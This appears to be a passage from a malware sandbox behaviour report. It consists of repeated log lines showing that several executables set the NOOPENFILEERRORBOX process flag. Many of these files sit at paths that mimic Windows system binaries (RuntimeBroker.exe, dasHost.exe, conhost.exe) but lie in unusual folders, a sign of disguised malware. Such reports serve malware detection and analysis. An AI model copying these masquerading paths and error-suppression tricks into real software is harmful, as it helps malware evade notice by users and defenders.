                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeProcess information set: NOOPENFILEERRORBOX
